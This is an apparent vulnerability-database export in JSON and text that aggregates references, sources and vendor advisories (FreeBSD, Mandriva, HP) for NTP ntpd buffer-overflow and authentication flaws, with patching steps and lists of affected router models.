        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2015:2520"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-356-01"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2783-1/"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-5300"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-7704"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:25/ntp-93.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-15:25.ntp.asc"
      },
      {
        "trust": 0.1,
        "url": "https://www.freebsd.org/handbook/makeworld.html."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:25/ntp-102.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/."
      },
      {
        "trust": 0.1,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:25/ntp-93.patch.bz2"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7703"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:25/ntp-101.patch.bz2"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:25/ntp-101.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:25/ntp-102.patch.bz2"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1551"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2519"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2517"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1550"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8138"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2518"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1551"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1550"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2518"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2517"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2783-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2"
      },
      {
        "trust": 0.1,
        "url": "http://gpgtools.org"
      },
      {
        "trust": 0.1,
        "url": "http://talosintel.com/vulnerability-reports/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9751"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3405"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7705"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7691"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5196"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9750"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7692"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#718152"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "db": "BID",
        "id": "77280"
      },
      {
        "db": "BID",
        "id": "92012"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "PACKETSTORM",
        "id": "134093"
      },
      {
        "db": "PACKETSTORM",
        "id": "137992"
      },
      {
        "db": "PACKETSTORM",
        "id": "138803"
      },
      {
        "db": "PACKETSTORM",
        "id": "134082"
      },
      {
        "db": "PACKETSTORM",
        "id": "136864"
      },
      {
        "db": "PACKETSTORM",
        "id": "134102"
      },
      {
        "db": "PACKETSTORM",
        "id": "134034"
      },
      {
        "db": "PACKETSTORM",
        "id": "134162"
      },
      {
        "db": "PACKETSTORM",
        "id": "134137"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#718152"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "db": "BID",
        "id": "77280"
      },
      {
        "db": "BID",
        "id": "92012"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "PACKETSTORM",
        "id": "134093"
      },
      {
        "db": "PACKETSTORM",
        "id": "137992"
      },
      {
        "db": "PACKETSTORM",
        "id": "138803"
      },
      {
        "db": "PACKETSTORM",
        "id": "134082"
      },
      {
        "db": "PACKETSTORM",
        "id": "136864"
      },
      {
        "db": "PACKETSTORM",
        "id": "134102"
      },
      {
        "db": "PACKETSTORM",
        "id": "134034"
      },
      {
        "db": "PACKETSTORM",
        "id": "134162"
      },
      {
        "db": "PACKETSTORM",
        "id": "134137"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-04-27T00:00:00",
        "db": "CERT/CC",
        "id": "VU#718152"
      },
      {
        "date": "2017-08-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "date": "2015-10-21T00:00:00",
        "db": "BID",
        "id": "77280"
      },
      {
        "date": "2016-07-19T00:00:00",
        "db": "BID",
        "id": "92012"
      },
      {
        "date": "2017-09-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "date": "2015-10-27T03:38:46",
        "db": "PACKETSTORM",
        "id": "134093"
      },
      {
        "date": "2016-07-21T15:56:23",
        "db": "PACKETSTORM",
        "id": "137992"
      },
      {
        "date": "2016-09-21T17:24:00",
        "db": "PACKETSTORM",
        "id": "138803"
      },
      {
        "date": "2015-10-26T19:32:22",
        "db": "PACKETSTORM",
        "id": "134082"
      },
      {
        "date": "2016-05-02T21:38:58",
        "db": "PACKETSTORM",
        "id": "136864"
      },
      {
        "date": "2015-10-27T23:30:50",
        "db": "PACKETSTORM",
        "id": "134102"
      },
      {
        "date": "2015-10-21T19:22:22",
        "db": "PACKETSTORM",
        "id": "134034"
      },
      {
        "date": "2015-11-02T16:48:39",
        "db": "PACKETSTORM",
        "id": "134162"
      },
      {
        "date": "2015-10-30T23:22:57",
        "db": "PACKETSTORM",
        "id": "134137"
      },
      {
        "date": "2015-10-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      },
      {
        "date": "2017-08-07T20:29:00.683000",
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-04-28T00:00:00",
        "db": "CERT/CC",
        "id": "VU#718152"
      },
      {
        "date": "2020-06-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "date": "2017-05-23T16:23:00",
        "db": "BID",
        "id": "77280"
      },
      {
        "date": "2016-11-24T01:13:00",
        "db": "BID",
        "id": "92012"
      },
      {
        "date": "2017-09-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "date": "2021-11-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      },
      {
        "date": "2021-11-17T22:15:44.397000",
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "134093"
      },
      {
        "db": "PACKETSTORM",
        "id": "134102"
      },
      {
        "db": "PACKETSTORM",
        "id": "134034"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NTP.org ntpd contains multiple vulnerabilities",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#718152"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      }
    ],
    "trust": 0.6
  }
}

VAR-201412-0613

Vulnerability from variot - Updated: 2024-07-23 21:56

Multiple stack-based buffer overflows in ntpd in NTP before 4.2.8 allow remote attackers to execute arbitrary code via a crafted packet, related to (1) the crypto_recv function when the Autokey Authentication feature is used, (2) the ctl_putdata function, and (3) the configure function. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Network Time Protocol is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successful exploits may allow an attacker to execute arbitrary code with the privileges of the ntpd process. Failed attempts will likely cause a denial-of-service condition. Network Time Protocol 4.2.7 and prior are vulnerable. Corrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE) 2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3) 2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15) 2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE) 2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7) 2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17) 2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24) 2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE) 2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21) CVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .

II. [CVE-2014-9293] The ntp-keygen(8) utility is also affected by a similar issue. [CVE-2014-9296]

III. Impact

The NTP protocol uses keys to implement authentication. The weak seeding of the pseudo-random number generator makes it easier for an attacker to brute-force keys, and thus may broadcast incorrect time stamps or masquerade as another time server. [CVE-2014-9295]

IV. Workaround

No workaround is available, but systems not running ntpd(8) are not affected. Because the issue may lead to remote root compromise, the FreeBSD Security Team recommends system administrators to firewall NTP ports, namely tcp/123 and udp/123 when it is not clear that all systems have been patched or have ntpd(8) stopped.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

freebsd-update fetch

freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch

fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc

gpg --verify ntp.patch.asc

b) Apply the patch. Execute the following commands as root:

cd /usr/src

patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as described in .

Restart the ntpd(8) daemons, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path Revision

stable/8/ r276073 releng/8.4/ r276154 stable/9/ r276073 releng/9.1/ r276155 releng/9.2/ r276156 releng/9.3/ r276157 stable/10/ r276072 releng/10.0/ r276158 releng/10.1/ r276159

To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:

svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

VII. This situation may be exploitable by an attacker (CVE-2014-9296).

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 http://advisories.mageia.org/MGASA-2014-0541.html

Updated Packages:

Mandriva Business Server 1/X86_64: 25fe56fc0649ac9bb83be467969c2380 mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm 9409f5337bc2a2682e09db81e769cd5c mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm df65cc9c536cdd461e1ef95318ab0d3b mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm 53f446bffdf6e87726a9772e946c5e34 mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFUqn7vmqjQ0CJFipgRAhTAAKCfH+XdZfDmtmE7lgzpV939wjHFdgCfZWiZ l2lk5bD8X4tOzwVyLnhX7Dg= =JIIF -----END PGP SIGNATURE----- .

See the RESOLUTION section for a list of impacted hardware and Comware 5, Comware 5 Low Encryption SW, Comware 7, and VCX versions. Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted CVE #

8800 (Comware 5) R3627P04 JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP 8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis, JC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808 Router Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis, JC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing Unit, JC597A HP 8800 Single Fabric Main Processing Unit

CVE-2014-9295

A6600 (Comware 5) R3303P18 JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit

CVE-2014-9295

HSR6602 (Comware 5) R3303P18 JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit

CVE-2014-9295

HSR6800 (Comware 5) R3303P18 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit

CVE-2014-9295

MSR20 (Comware 5) R2513P45 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router

CVE-2014-9295

MSR20-1X (Comware 5) R2513P45 JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router, JD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service Router, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW Multi-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP MSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router, JD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1 Multi-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router (NA), JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12 (0235A32E), H3C MSR 20-12 T1 (0235A32B), H3C MSR 20-13 (0235A31W), H3C MSR 20-13 W (0235A31X), H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W (0235A31R), H3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P), H3C MSR20-12 W (0235A32G) CVE-2014-9295

MSR 30 (Comware 5) R2513P45 JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40 Multi-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP MSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service Router, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF232A HP RTMSR3040-AC-OVSAS-H3, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S), H3C MSR 30-20 (0235A19L), H3C MSR 30-20 POE (0235A239), H3C MSR 30-40 (0235A20J), H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60 (0235A20K), H3C MSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V) CVE-2014-9295

MSR 30-16 (Comware 5) R2513P45 JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16 Multi-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router, H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238) CVE-2014-9295

MSR 30-1X (Comware 5) R2513P45 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C RT-MSR3011-AC-OVS-H3 (0235A29L) CVE-2014-9295

